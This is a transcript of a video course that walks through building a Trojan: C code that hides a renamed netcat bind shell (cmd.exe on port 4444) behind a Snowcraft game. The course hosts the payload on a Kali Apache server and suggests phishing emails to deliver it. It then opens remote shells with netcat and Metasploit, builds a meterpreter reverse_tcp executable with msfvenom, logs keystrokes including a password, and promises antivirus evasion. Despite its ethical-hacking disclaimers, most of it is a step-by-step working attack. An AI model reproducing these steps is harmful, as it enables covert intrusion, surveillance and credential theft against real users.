In this series of videos, you're going to learn what malware actually is. You're going to learn by looking at examples where we create different types of malware and Trojans. You're going to learn how to use malware to infect live machines. You're going to learn how to take control of live machines, how to send data from a PC to a victim's machine. You're going to learn how to create backdoors and Trojans. Now, this information is being shared purely as an informational purpose only. We do not advocate any illegal use of the trainings in this particular series. The idea is to educate you on what is possible, what attackers are using out there to make lives of users extremely difficult, and techniques to prevent and mitigate these types of attacks. The main difference between a Trojan and a virus is that Trojans do not replicate. Viruses, on the other hand, replicate and then infect other machines. The main difference here is Trojans will infect a victim's machine, and we'll talk about the different type of Trojans that actually are available that are the most destructive. The thing is with Trojans, they hide in memory and are very hard to detect. One particular type of Trojan is called the remote access Trojan or RAT. Now, these have the ability to take control over a victim's machine. And when I say take control, you can control the camera, you can control the keyboard, you can log the keystrokes, you can run programs on the victim's machine, you can share files between your machine and the victim's machine, and that is extremely dangerous. It's almost like a remote control of the victim's machine. Another type of Trojan is a data sending Trojan. And this is also very prevalent because this type of Trojan obtains sensitive information from a victim's machine, and when that sensitive information is found, it emails the attacker things like passwords, credit card details, any sensitive information that it will find, it will automatically email that to the attacker. Very dangerous because we've seen instances where people have opened additional bank accounts linked to that a person's online account and are then able to transfer funds between accounts to PayPal, all these different things that then cause even further financial loss to the actual victim. Another type of Trojan is the destructive Trojan. These destructive Trojans are built to basically damage settings on the victim's machine. They can delete critical files, then also allow the user to want to reboot the machine, and when the user tries to reboot the machine is then unable to log in, unable to reboot after that, basically lose critical files, and will then have to reinstall Windows, bootloaders, etc. to get the machine up and running. And this can cause some significant loss of resources, of files, and even time. One other type of Trojan I want to talk to you about is the denial of service or DOS Trojan. These denial of service Trojans basically cause the network to become choked with useless and unnecessary traffic. Now, this attack basically exploits a limitation in the TCP/IP protocol. While there are software fixes to enable this to be prevented in some way, you have firewalls that can help detect this type of attack. The problem is that these Trojans are in most cases very difficult to detect and mitigate against. So let's look now at how we can start building a Trojan and then demonstrate how we can perform some of these attacks. Remember, these lessons that I'm sharing with you are purely from an information point only. This is not meant for you to learn to then go on and create malware and create Trojans to infect other users, because there could be some significant liabilities and prosecution if you are found guilty. Now, to build a Trojan, we need a C or C++ compiler to build this particular Trojan. So let's go and find a compiler in the next video where you can actually start building your first Trojan to see how this all works in practice. Let's now look at getting a C or C++ compiler. What we will be using for this particular exercise is a program called CodeBlocks. CodeBlocks is a free cross-platform open source C and C++ compiler. So we want to install that before we actually create our first Trojan or malware type program. I'm running this Windows XP machine on VirtualBox. Now, you may be running it on a different environment, but for this particular example, I'll be running it under Windows XP on this VirtualBox. So to do that, I need to go to a website called codeblocks.org. So let's open that shortly. CodeBlocks also has a number of extremely useful plugins. So when we install the setup file, we'll also be including a number of plugins. So let's go to codeblocks.org and explain to you exactly what type of environment this works under. Again, I'll be using Windows XP. You could be using any other environment, and I'll show you all that in a second. So codeblocks.org is the website. So let me just type that in here. And once the site opens up, we will be able to see that CodeBlocks is the open source cross-platform free C and C++ compiler. It's also able to use Fortran, but for this exercise, we'll be using C and C++. So you'll see a downloads link here. We click on that, and you'll note that there are some options that are more suitable to your specific needs. When we click on the link which says download the binary release, we'll be able to see the different options available for us. So let's click on the download the binary release, and we will see that this CodeBlocks application is for Windows XP, Vista 7, 8, and 10 versions of Windows, also for Linux 32-bit and 64-bit, and also for the Mac operating system. So we have a number of options here. Let's go to the Windows section. I will be selecting the mingw-setup.exe, the fourth option here. This is the one. So I need to click on the link on the right hand side, which will allow me to install this particular release. So it will then redirect me to sourceforge.net, which will then have the application file. The download should start shortly, but for now, notice that it does say SourceForge at the top. It is looking for the file. Sometimes you may have to wait a short while before the download starts. If it doesn't, you can go back to the previous page and try downloading it again. I think I might have to do just that to make sure that this download works. It looks like it's not accepting the file. So let me go back for a second, and you'll see the file should open up here, and it will allow me, here we are, allow me to save the file. So let me save this file. Depending on the internet speed that you have, this may take a short while or a little longer. I'm going to pause the video shortly, and then we'll resume the recording once it has been downloaded. So here we are, downloaded. I can double click this file and then hit OK and hit run. You will see this opens up, and I click next. I agree. You want to make sure that all these options are ticked. As you can see, they're all ticked, so I just simply click next. If they're not ticked, make sure you tick each one. Just select the folder, hit install, and that should start installing the CodeBlocks application. Again, it might take a short while. I'll just let it run until it has been installed, and then we'll look at the environment shortly and then go on to start building our first application. Once that has been complete, I simply hit yes to run this. Let's click on complete the installation. So let's wait for CodeBlocks to open. You'll see here it says the GNU GCC compiler has been detected. I want to set that as default, so I click on the link here and then hit OK. It will give me one other option which allows me file associations. As you can see, the third option says C and C++ file types. And the fourth option says associate with other file types as well. So I will select the last option and hit OK. And here we have the dashboard of the Code Blocks application. Before starting to create our application, let's minimize this window and close some of the background windows. So close this, the downloads window, and let's close the browser. Once CodeBlocks has been installed and is working, you need a few additional tools. So to do that, the first thing we want to do is download the Adobe Shockwave Player. So simply type in Adobe Shockwave Player into a search address bar. If you already have the Shockwave Player, you don't need to download it again. Simply find the download link as you'll see here, and I can hit the download now. I will let this download. I won't let it run all the way through. But once it has been downloaded, we can run this and the installation will begin. Once this has been finished, I don't want to worry about Google Chrome right now. Simply click Next, and the installation has been complete. Now, we want to download a very simple game for now, and that game is called Snowcraft. So let me go to the search bar and download that particular game, and I'll show you how we use that in a second. So here we have the snowcraft.exe file. I just typed that into a Google search. You'll find a link where it says clip to net. Click on that and I can download this executable file to my desktop. I am going to create a specific folder which will allow all the files I am using to be stored in that particular folder. So I want to copy this, and I've already created a folder here called C Tools Snowcraft and dir. So I simply paste the Snowcraft file here. This folder C:/tools/snowcraft/dir will now have just one file called Snowcraft. The next step we want to do is go back to the browser window and search for one more application called Netcat. So let's do Netcat and let's look for the Windows version. So let's type in Netcat Windows and let me find that particular link. Here we have the link here, and this particular tool allows data to be transmitted across the network, meaning it can read and write packets of data across the network, all from the command line. So here we'll find a link which looks like a zip file. Let me click that and okay, let's save that file, and then we'll unzip that file and get the netcat file. Let's unzip this, and once that's unzipped, I'm looking for a file called netcat, NCAT. I want to copy this file to the same directory we had the Snowcraft file as well. So let's go in and paste it into this particular directory. So now this folder has a Snowcraft exe file and an ncat exe file. Let's look at how we'll be manipulating these files in the next video. For now, you'll see that we have been able to download a simple game called Snowcraft and the ncat utility, which will allow us to write packets of data across the network, read and write packets of data. The ncat tool is a very popular choice for hackers all around the world because of the monitoring of packets via the TCP port or the UDP port. And the beauty of the ncat tool is it has a number of features. It has a debugging feature as well. And the best part is it can actually monitor traffic on those ports without the user even knowing that there is a monitoring process in the background. So again, a very popular choice because hackers would use this type of tool using a game like Snowcraft or something like that to deceive the user, allowing the user to install this game, but secretly installing the NCAT utility, which will then allow monitoring of those ports for data and any sensitive information. I want to rename this NCAT file to something like chest.exe. And now let's just double click the Snowcraft so you can actually see what that actually looks like. It's a very simple game. Let's just run this, and it's basically throwing snowballs. So as you can see here, I'm not very good at games, but let me just try. And as you can see, it will keep the user interested for a while. But again, in the meantime, a hacker potentially has installed a Trojan or a monitoring utility in the background. As you see, I'm not very good at this game. I've lost my 2 characters already, and let me see if I can do any better. But again, as you can see, a very addictive little game that will allow the user to simply play without realizing the potential threat that is lurking in the background. So let's go to code blocks now, and let's create a simple malware type application in this particular program. So what we want to do is create a new file, and let's save this file firstly, and let's call this Snowcraft. It will create it with a .c extension. So let's go to the appropriate directory and save the file accordingly. We had a directory created called tools and Snowcraft. Let's create it within this directory, and we'll call it Snowcraft, and it will save it with the extension .c. Once that's done, we can then create our first bit of code. We need to include the libraries, the stdio.h and the stdlib.h as well. So to do that, we need to use the include statement. With this, it will allow us additional libraries, etc. So let's do that by typing in include, and then the first one is stdio. So I use the hash include stdio.sh in the less than and greater than brackets, and let's also include stdlib.h as well. And now that we have those 2 files, we now just need to write a very simple piece of code. Int main, and within main we want to have the following, which will be in these brackets. And what we want to do is basically load up the netcat file, which we have called chest.exe, and we then also want to load snowcraft.exe straight after that. So to do that, we type in system, and with system we need to start, and we want to start chest.exe. So within these brackets we type in start. We had simply renamed the NCAT file to chest.exe, so we simply type in start in these quotation marks, and we need to find the directory path. So start/b dir, the 2 slashes, then chest.exe. dir was the directory we had created earlier. I'll explain these additional tags, the -d, -l, -p. We want to run it in daemon mode, listen mode, and basically to listen to on a specific port. So this is the directory we created earlier. We call ncat chest.exe. So basically we're asking this particular program to load up the chest.exe file, daemon, and listen, and we'll put port 4444 to have this particular port that the ncat utility will be listening on, -e, and we want to run it with the cmd.exe file. Very simple. Start /b, the directory path / chest.exe, -d, -l, -p, and now we also want to put in system, which then loads up the snowcraft.exe file. We type in dir / snowcraft.exe. So basically this program will run. Once someone clicks the executable file that we will just build in a short while, it will load up chest.exe in the background and also load up snowcraft.exe, so the user does not see anything different. All they see is the snowcraft file, but we know it has opened up the additional ncat utility in the background. So in this manner, a hacker would create a little program that basically loads up a game, and before loading the game, loads a netcat utility that then allows the port to be listened on, and the hacker could retrieve data accordingly, knowing what ports are open, what data is being transmitted, etc. So this is how a hacker would basically deceive the user. The game opens up as normal, but the chest.exe file opens up in the background and the user does not even know it. So we've saved the file. Now you see that it is a CPP file. Let's compile this and let's look at whether there are any errors. So compile. Let's go to the build log to see what that looks like. And everything looks fine. Now we want to run that to see how it actually works. So I can simply click the play button here and you'll see the netcat utility opens up in the background and the snowcraft game opens up in the foreground. With some commands we can actually hide the netcat utility. So let's just close this for now and show you how the netcat utility actually works. So if I click the snowcraft file here, you'll see it open up the netcat utility in the background and the game in the foreground. Now let's look at what happens if we go to a command prompt to see if that actually is running. So once the program is running, we go to Task Manager and have a look here. You'll see a file called chest.exe that is running. Let's make sure that it is working on the actual port. To do that, we can go to the command prompt to see exactly how that works. Remember, we renamed the netcat utility to chest.exe to make it less known, less visible to the average user. Now, let's go in further and open up a command prompt. And in command prompt, I use the netstat command, and netstat /na. Hang on a second, let me just remember this command. Netstat /nat. Is it nat? No, it's a -na. Netstat -na will show us that all the programs that are running here, you'll see there's a TCP on port 4444, which is our chest.exe file. To investigate that further, we can go in and do further analysis to find out exactly what the program is. So to do that, we can go to something called task list. Task list is like a program manager, but from the command prompt. If I type in task list, and let's have a look at the programs that are running. Let's go through and look here. You will see the chest.exe program running on process ID 936. This number we can look at in more detail now, because now we want to know what exactly is this program doing. So I can do netstat -nao, and you will see here on port or process ID 936 we have chest.exe running, and you'll see it has TCP on port 4444. So in this way, we know chest.exe is running and listening on port 4444, which is the netcat utility that we had secretly included when the user ran the snowcraft.exe file. You want to make sure to use a port that is not really commonly used so that there are no problems with the program actually running. We've picked 4444 here to make sure that it is not a port that is normally used. I'm just closing some of these programs now. What we want to do is just get rid of some of the files that we are not needing. So let me close these manually. What I need to do now is just move the Snowcraft C++ file and the Snowcraft o.o file. Need to move this. Let's move them to another directory away from this particular directory because I want to zip the file, and that's the file we'll be using to infect a vulnerable machine. So let's go back to that folder, and you see the Snowcraft file here. The next step would be to rename this file to something like Snow Game. Doesn't really matter, just rename it to whatever you want. And now it still works. You can see that it's still loading up. Netcat utility in the background, this game in the foreground. Let's close all these applications again. So we don't need all that running. And what you then want to do is work out how to zip this file. We'll use 7-zip or WinZip, etc. You could use any utility to zip the files, and we will then include that on the vulnerable machine and show you exactly how a machine can be infected. Now that we have created our simple malware application, let's start Apache server on Kali Linux, and let's move the Trojan to that server, and then let's look at how we can get that Trojan onto a victim's machine, in our case, a machine in our test environment. So the first step would be to then load up Kali Linux. So to do that, I will open up Kali Linux, and I won't go through too much about how to get this onto the server, but I'll just show you how I do it. So let's start Kali Linux. It may take a short while to load up. Just wait for it to all open. And remember, what we're doing here is we want to start the Apache server on Kali Linux. We then want to move the malware application that we created to this Apache server, and we then want the victim's machine to download the game with the malware attached to the game. And we then want to look at how we can then take control or be able to monitor what's actually happening on that victim machine. So let's go in and wait for Kali Linux to load up. Once that has loaded, I will log in with the root username and password. Once we have logged in, we then want to check if the Apache server is running, and I'll show you exactly how we do that in a short while. So here we are logged into Kali Linux. We then want to go in and check whether Apache is installed and whether it's actually running. Let's go to the command prompt, the terminal window, and here I just want to get the IP address. So ifconfig shows that this IP address is 192.168.56.102. That will be important shortly, but let's go on and check for the Apache server and the state that it is in currently. To do that, we need the ps command, ps minus EAF. So I'll type that in now, and then we'll go on to see whether Apache is running. So ps minus EAF, we then type in grep, GREP, and we type in Apache to look at the process status. Now to see the running of the actual Apache server, we type in /etc, and we want to then start the Apache. init.d/apache2, and let's check the status. We see that it says inactive here, which means it is not running. To get that to a running state, we type in the same command /etc/init, but at the end of this line we put in start. Once we have done that, the Apache server will start. It will go through and tell us that the Apache service has started. As you will note here, Apache server is running as indicated in green, and these are the process IDs allocated to the Apache server. If you don't have Apache server on your Kali Linux machine, you can use the apt-get command, install Apache 2, but because we already have it here, we don't need to run this. You may want to run it if you don't have it installed. Now let's move on to create a username and password to access the Apache web server. So we want to go into the vim/etc Apache 2, and let's have a look at what's available here. You will note that we can look at the Apache 2 conf file, and in the conf file we want to check if the home directory is located. I'm just looking for that home directory now so we know how to access that shortly. Here we are, var/www. I will quit the editor and let me go to see what confs are enabled. So I type in conf-enabled to see what is enabled, and I then want to go to the actual path, so cd to the particular, var/www, and here we see the file names. I want to make a directory called games. That is where we will store our snow game. So let's call this games, and I then see the folder is there. I then want to go to that folder and see what's available. Obviously nothing in there right now. We now want to create a username and password to access this particular server via FTP. We will download a client like FileZilla shortly, but let's go in and create a username. Let's call it test for now, because we will need to log in with a username and password via FTP to then upload our games file to that particular directory that we just created. So to create that, we need to create a username and a password. So let's see what we can do here. /etc/init.d, and we then want to type in SSH to see whether the service is running. It's not running, so we need to start the service. We use the start not restart, and yeah, you'll see it says active on port 22. That's also important for our FTP client shortly. I will be using the free FTP client called FileZilla shortly. So this port 22 and a username and password would be important for us to be able to use the FTP program to access this web server. So the first thing we want to do is create a username. So user add, and let's call the user test. So we have a username called test, and we then want to create a password for that user, passwd test, and now I'll put in the password to enable login to the Apache server from our FTP client. Now we have created a username, we know the password, we have the port number. The next step would be to note down the IP address 192.168.56.102, as we'll need to add that to our file FTP client as well. So we want to go and download a program called FileZilla. This is the version that will be available for Windows XP. So let me download that because we want to install it on our Windows XP machine to move that file that we created on that Windows XP machine to our Apache server. So let's run this, go through the installation, and once that has been done, we'll then be able to log in to the Apache server with that username, password, IP address, and port number. So here we have the FileZilla client. Just click next a couple times. I need to put in the IP address 192.168. Oh, unfortunately, this machine is not on the same network. So let me go in here and change this to host only adapter, which then will allow us to reset and renew our IP address. So to do that, we type in ipconfig again, and we see that ipconfig/renew all, and that doesn't seem to be working. So I'll type in ipconfig/renew. Now this should give us a new IP address on the same network as the Apache server. Once it has given us a new IP address, I'll then be able to log in to that IP address that we had set up earlier on the Kali Linux machine to allow us to move this file to that particular machine. Here we've got a 103 extension, so I can then ping the 102 machine to make sure it is available on the network. And here we see the ping is working, so we can go back to our FTP client 192.168.56.102, put in the username and password we created a short while ago, and we need to make sure the port number is 22 so that we are allowed to connect to that particular port. And let's have a look if this works. I just need to click OK here, and that will allow me to go through. Always trust this particular connection. As we can see here, we are in the Apache server. I need to find that directory that we just created. Let's go back to the top level. But for now, we want to get the tools folder, the snowcraft. We see in that snowcraft folder we have snow game. So for now, I will stop this video. We have found the file that we need to FTP to our web server. In the next video, I'll start moving that file to the appropriate folder on the server. Let's now move the snow game file to the server, and I'm going to move it to a folder called test for now, and then we'll move it to a proper folder shortly. But if you have some trouble using FTP for whatever reason, you can actually go into Kali Linux and set the permissions. You can actually make the directory, the test directory, and then change the permissions if you do have any challenges uploading the file from your machine to the server. To do that, you can type in mkdir and the test directory, and then you can do another command called chown, and we want to create the permissions for the test directory, and with the proper permissions we do it with the chown command, and that should enable you to upload the snow game file easily to the folder. Once the file is in the test folder, we want to move that file to the proper directory, which is the games folder. So let's go in and do that. And if we go to the listing of the directory, we'll see there's a test directory. Let's go to that directory, and we should see the snowgame.exe file. So let's copy cp That's the command we use to move this file or copy this file from this folder to the var games directory. So we type in var www and then it's games. Once we have that, we can go to that games directory and let's have a look at the file structure and if the file is available. Here we the file within that directory listing if you have enabled directory listings. So localhost / games will give us the directory structure and hopefully that file name listed there. So / games, and let's look at the directory structure and we should see the snowgame.exe file here. Now, if the listing is available, the user could click on this snowgame.exe and download it. I will show you shortly that there may be an error because of the full directory not being there. But by copying the full listing, this is the actual path name. You have localhost here, but if you do have an actual live IP address, you would simply use the localhost instead. You'd use the IP address instead of localhost, like 192.168.0.56.1 or 56.102, whatever the IP address of that machine is, you'd list it there. So if the victim's machine had to load the file from their PC, they would point to this particular directory and get the file. So let's now go to the actual PC, the Windows XP machine, and let's perform the similar task there. So if I go to the IP address 192.168.56.102/games, we see the listing of snowgame.exe here. If I then act like the victim's machine and click on the link and then download the file, we see if I save the file will be saved. But when I run this particular application, it should throw an error because it doesn't have all the files or the proper directory structure here. So as we'll see, there's an error. And because of this error, we can then go back to the FileZilla program and make sure that we upload the whole directory. So let's do that now and go in and make sure. So if you do see this error, the error is most likely caused because you've only uploaded the snow game file and not the full directory structure. So let's type in test and port 22, and let's go in and copy the whole snowcraft directory across to this folder on the server. Let's try that again. Drag the whole directory across, and now that's copying the whole directory. Once that is done, we then want to move that to the proper games folder. So let's do that, and let's do a listing again and copy the home test snowcraft directory, and we'll copy that to the var games directory. I'll put a -r command to make sure that it copies all the files, and let's move it to that particular folder, and let's have a look if the files have been copied across. And there we see a directory called snowcraft, and what we now want to do is zip that snowcraft folder. To do that, I need to use the zip command, and I want to then name the file something like snowcraft.zip, and then I want to make sure I select the folder snowcraft folder, and that will zip that file. I also want to add the -r tag to recursively zip the files. Sorry, I need to put an extra space there, and that should zip all the files into a zip file. So we see snowcraft.zip. Now all we need to do is then go to the victim's machine, and instead of downloading just the exe file, we want the user to download the zip file, then extract the files to a directory, and then run it in that way. And we will see the Snowcraft program open, and we'll also see the netcat utility called chest open up as well. So here we have the zip file, downloaded that. Let's double click the Snowcraft file, and we'll see that it has a number of files within it as we had discussed previously. And look into this folder, we see the directory listing. Let's run that, and now the game should open, and we see the netcat utility called chest listed in the background. Here's the game all working. We now have the ability to then monitor on port 4444 exactly what's happening on this particular machine. And now I'll show you exactly how we can take control of the victim's machine. And let's go back to netcat on the Kali Linux machine. So NC, and we need to go to the IP address 192.168.56.103, and we want to put in the port 4444. And as you can see here, it's showing me Microsoft Windows XP. So here I am in the tools Snowcraft directory on the Windows XP machine. This is a reverse shell of Windows XP. I can do a directory listing. I can see exactly what files are here, and you can pretty much do anything you want because now a reverse shell has been opened on that Windows machine. The user has simply downloaded a zip file, and now we can see their IP address. We can then look at their task list and see exactly what files are running on this machine, and you pretty much have complete control of the victim's machine. So let's go and have a look at the task list. You'll see the chest.exe file running. We'll see the Snowcraft and Snow game files running as well. So we can actually see what programs are running and pretty much get control of this particular machine. So very simply, we've been able to simply get the user to download a zip file, and the zip file impersonates a game on the front end, but behind the scene, it's opened up a reverse shell for us to basically be able to take control of the victim's machine. You could potentially send the exploit in an email to an unsuspecting user. Basically, you'd write an email that looked quite similar to something that a person would send to the user and say something like, check out this cool game, with the link to the server to download the malware zip file. Now, if the user then clicks on the link, downloads the malware zip file, that opens up a backdoor for you to be able to access that particular machine. In instances where the IP address is on the same network, that's fine. If the IP address is on the same network, you can listen to the netcat utility on port 4444. However, this opens up some challenges when the IP address or the user is on a completely separate network. If it is on a separate network, there are some workarounds that we can use by firstly looking at the Apache server logs, and then I'll show you how we can use the Metasploit framework to access that particular IP address. So one of the first things I want to do is have a look at the Apache server logs. This server log will look different on your machine, again, depending on your configuration and what server you're using, etc. But for us, we're using an Apache server environment here. I can go into the server logs, and let's look at how we do that by then accessing the server log and tracking the IP address. So let me go into the log file /var slash var log, and I type in AP. Let's just see what's Apache 2. Let's go have a look at the access log here, and let me look at this. You can see in this log there is an IP address called 192.168.56.103 that is trying to access this Apache server. And you can see this IP address a few times, which would indicate that the user has tried to access this file on the Apache server. So in this way, we are able to determine the IP address of the victim's machine and then use the ncat utility with the port 4444 to then access this particular IP address. Now these logs will look different depending again on your server configuration. I want to show you another way of finding the IP address of the user or connecting to this specific IP address once we've looked at the server logs, and that is by using the Metasploit framework. So to do that, I type in MSF console, which gives us access to the Metasploit framework. Now, once I am within the Metasploit framework, I can then create an exploit and connect to this particular IP address. This takes 5 to 10 seconds to load up. Once it loads up, we'll be able to look at the different exploits that are available and then create a payload for us to be able to connect to that specific IP address. So let's use something called exploit, and what we want to use is the exploit multi handler. So once we are in the MSF exploit handler, I can then look at the different exploits. We will be using a TCP bind option here. So let's look at the options. As you can see, there are no options selected at this particular point. We need to set that. So to do that, we can show options again and see there is nothing listed here. To then set the payload, we type in set payload, and we want to use Windows/shell and then _bind_TCP. That's the payload we will be using. We can look at all the payloads by just typing in set payload Windows/, and this shows us all the different payloads that are available. I'm not going through all the options right now. We simply want to use the shell bind TCP one, and let's go in and make sure that's working. Windows shell _bind_TCP. Now all I need to do is select options, and you will see here it has the process, it has the L port set at 4444. What it doesn't have is the R host. So we need to set the R host to the IP address that we found earlier. So we do that by typing in set R host and the IP address of the victim's machine that we found in the server log previously. So the L port again is the port that we're going to listen on, but the R host is the IP address, which at this particular point is not selected or not set. So set R host, and we then type in the IP address, which was 192.168.56.103. If I then look at the options now, it will show us the R host listed in the screen. So we know that this is the port and the IP address. Now all I need to do is type in exploit, and this will open a reverse shell to the particular IP address or victim's machine. So exploit and enter, and this will give us access, as you'll see here, Microsoft Windows XP. I can now see a directory called C tools snowcraft. I can then type in a directory listing. So let's do that by, sorry, that's not suitable here, dir. Let's go up a directory again. And as you can see here, these are all the files that are on the Windows machine. I can look up the IP config address and we will see 192.168.56.103. So we are on the Windows XP machine. And this is how we are able to then take control in a covert manner of a victim's machine. We found the IP address, we use the Metasploit framework to then type in the IP address and then open up a reverse shell to the victim's machine. If I type in exit here shortly, I'll be then going back to my Kali Linux environment, and then I'll show you how we can then simply come back into this particular environment. This is a covert way the user won't even know that we are accessing the machine. So let's exit now, and as you'll see, it's closed the connection. And if I have the MSF exploit again here, simply typing in exploit will open that connection again. As you can see, I'm in this tools snowcraft directory. CD double dot will get me one directory higher, and again will get me to the top root directory with all the files listed here. I can copy files, edit files, move files to the server, pretty much take control of the victim's machine, giving us complete access. So in this quick video, we've looked at how to find the IP address. We've looked at how to use the Metasploit exploit kit, and we've been able to create a very simple malware application to then take control of a victim's machine. Now, this is a very simple application. We'll be moving on into more complicated ways and a more undetectable type of malware in future lessons. And hopefully that has given you an insight into how to access a victim's machine. So what happens when we have victim's PC on a different network than the attacker's PC? What we want to do in this situation is firstly run the NCAT utility on the attacker's server and listen in on port 4444. And at the same time, we then want to run the NCAT utility on the victim's PC. Now, the NCAT utility is bundled in with the application, so the user runs the application and the NCAT utility runs in the background, but then connects back to the attacker's server on the same port, listening in on the port 4444. So this is how we would do it. So firstly, let's go to the attacker server machine, and we want to run the NCAT utility here. So we type in NCAT or NC minus L minus P, and then we put in the port number of 4444, and let's listen out and make sure this works. And unfortunately, I've used the wrong L. I need to put lowercase l, and that should start running. That is running. So now let's go back to the victim's PC and run the chest.exe, which is the NCAT utility that the user does not know is on their machine. So let's simulate that now and show exactly how it would work with the NCAT utility running on the victim's machine and how the ports will be the directory path, and let's go to the command prompt. Let's go up to the directory we had created first, which was the cd tools directory, and within that there was a snowcraft and then a dir directory. Here we have the chest.exe file. Now at this point, all we have to do is type in chest.exe. We need to put in the IP address of the attacker's server machine, which is 192.168.56.102. And we then want to put the port number, which is 4444, and that will create a connection between the attacker server machine and this particular client machine, which is the NCAT utility is running in client mode on the victim's PC. When I type a character in on the victim's PC here, and let's go back to Kali Linux, we would see that connection made and the letter here as well. I type in something in this window, and let's go back to the Windows machine, and we should see that letter visible there as well. Now let us use Metasploit to create an exploit. For this, Metasploit is extremely simple, but yet can create extremely powerful exploits to be used on Windows machines. So don't get fooled by the simplicity of it. It can be used to create extremely powerful programs. So let's look at how we can create an executable file on the Windows machine that will be used on the Windows machine, but we will create it within the Metasploit framework. So let's do that by going into MSF console, and we will use a command called msf venom. I'm running the Metasploit framework on a Kali Linux machine, so if you have a Kali Linux installed on a machine, this Metasploit framework should come installed. If not, you can obviously install it, but let's go in and look at the msf venom. So I'll type in that, and I can use the -h command to look at what options are available. Once I have the options listed, I'll show you that I can then create -p, which is the first one here on the list, to create a payload exploit. So to do that, I type in msf venom and I use the -p command, and I'll show you how I put in these particular filters or arguments required for this particular payload we are creating. So let's create a very simple one here by typing in msf venom. I will use the -p tag for payload. Then I need to use the arguments for the port and the IP address, which will be the IP address of this machine. We want to open a reverse TCP, so I use Windows/meterpreter. Sorry, let me just fix the spelling here. And then I put in reverse_TCP. Then I need to identify the IP address, which is the IP address of this particular machine. This will open a reverse TCP connection from the victim's machine to this attacker's machine. So I need to put in 192.168 for lhost, 192.168.56.102, which is the IP address of this particular machine. I then need to put in the port, so L port, which would be equal to 4444, and I can then put in a template. Let me use the template. I'll just use R for now, capital R, and then let's create the file. We'll call the file games.exe, so R greater than sign, and that will be called games.exe. So this should create a file called games.exe, with this particular exploit within that exe file. The next thing we want to do is move that games.exe file. As you'll see here, it has created using the x86 platform for Windows machines. Now I can just list the directory. I then want to copy the games file, the games.exe file, to the folder var www/games, and we'll then use the Windows machine to access this games.exe file and install this payload. So now let's type in keyscan dump to get the results required. When we do that, you see that we had typed abc.com, then we entered with the return key, then cnn.com, then return again, and then we typed in gmail.com, we typed in an email address, and then we put in the password test123456. So as you can see, by the use of the Trojan and Meterpreter, we are then able to log keystrokes and see exactly what the user is typing on their system. And these results are then dumped very easily by typing in keyscan_dump and get all the results easily on our machine. So in these series of videos, we've looked at Meterpreter, and with the help of the Trojan installed on a victim machine, we are now able to dump their keystrokes. We are able to take control of a webcam if a webcam was present on the victim's machine. We can copy files, modify files, pretty much take control of the victim's machine with things like this Trojan and Meterpreter. We've looked at a few functions of Meterpreter, but realistically, this program, Meterpreter, can be used in such a way that it is almost undetectable by some of the top virus scanning software, as we've seen when we loaded up VirusTotal, and not many of the big name scans were able to pick up that we had a Trojan. So experimenting with different options in Meterpreter will give you a much higher ratio of detection or evasion on the VirusTotal website. So in future lessons, we'll be looking at making an almost undetectable Trojan or malware that is pretty much undetectable by many of the big name virus scanning software. My strongest recommendation to you is to take these lessons and use it in a controlled environment, and don't go out infecting real victims on real machines. You want to take these skills to a prospective employer or a corporation and let them know that you are skilled in detecting malware and why you will be an asset to their organization. Use these techniques to be an ethical hacker